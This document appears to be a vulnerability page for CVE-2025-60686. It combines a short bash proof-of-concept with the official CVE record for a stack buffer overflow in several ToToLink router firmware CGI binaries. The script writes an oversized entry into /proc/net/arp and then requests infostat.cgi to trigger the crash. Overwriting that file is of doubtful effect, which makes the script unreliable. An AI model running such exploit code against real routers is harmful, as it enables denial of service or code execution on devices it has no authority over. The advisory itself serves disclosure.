CVE-2025-60686

#!/bin/bash # CVE-2025-60686 PoC - ToToLink Router Local Stack Buffer Overflow # This PoC demonstrates writing a long string to /proc/net/arp to trigger buffer overflow # Generate a long string to overflow the stack buffer # The buffer size is unknown but we generate a long string to trigger overflow LONG_STRING=$(python3 -c "print('A' * 1024)") # Backup original /proc/net/arp cp /proc/net/arp /tmp/arp_backup # Create malicious ARP entry with oversized data echo "192.168.1.100 0x1 0x2 "$LONG_STRING" * eth0" > /proc/net/arp # Trigger the vulnerable CGI script echo "Triggering infostat.cgi..." curl -s http://192.168.1.1/cgi-bin/infostat.cgi 2>/dev/null || echo "Service may be down" # Restore original ARP table mv /tmp/arp_backup /proc/net/arp echo "PoC execution completed"

{"cve": {"id": "CVE-2025-60686", "sourceIdentifier": "[email protected]", "published": "2025-11-13T16:15:52.590", "lastModified": "2025-11-19T17:41:28.740", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A local stack-based buffer overflow vulnerability exists in the infostat.cgi and cstecgi.cgi binaries of ToToLink routers (A720R V4.1.5cu.614_B20230630, LR1200GB V9.1.0u.6619_B20230130, and NR1800X V9.1.0u.6681_B20230703). Both programs parse the contents of /proc/net/arp using sscanf() with \"%s\" format specifiers into fixed-size stack buffers without length validation. Specifically, one function writes user-controlled data into a single-byte buffer, and the other into adjacent small arrays without bounds checking. An attacker who controls the contents of /proc/net/arp can trigger memory corruption, leading to denial of service or potential arbitrary code execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.5, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:totolink:a720r_firmware:4.1.5cu.614_b20230630:*:*:*:*:*:*:*", "matchCriteriaId": "BCA249C9-68D4-48FE-B0CA-77ECF53DDE3B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:totolink:a720r:-:*:*:*:*:*:*:*", "matchCriteriaId": "A1DE5168-B787-462C-B024-2B8F73759034"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "matchCriteriaId": "00F36DE9-D043-4C8B-9EF9-8DA669589E85"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "8442849E-5B06-41A1-8DA8-827FBD7A34E5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:totolink:nr1800x_firmware:9.1.0u.6681_b20230703:*:*:*:*:*:*:*", "matchCriteriaId": "7F9DCAA5-1EC6-44A1-9606-B6FBF29DEC65"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:totolink:nr1800x:-:*:*:*:*:*:*:*", "matchCriteriaId": "B4D2D0E8-2678-4238-8229-83450ECA1153"}]}]}], "references": [{"url": "http://totolink.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/yifan20020708/SGTaint-0-day/blob/main/ToToLink/ToToLink-A720R/CVE-2025-60686.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.totolink.net/", "source": "[email protected]", "tags": ["Product"]}]}}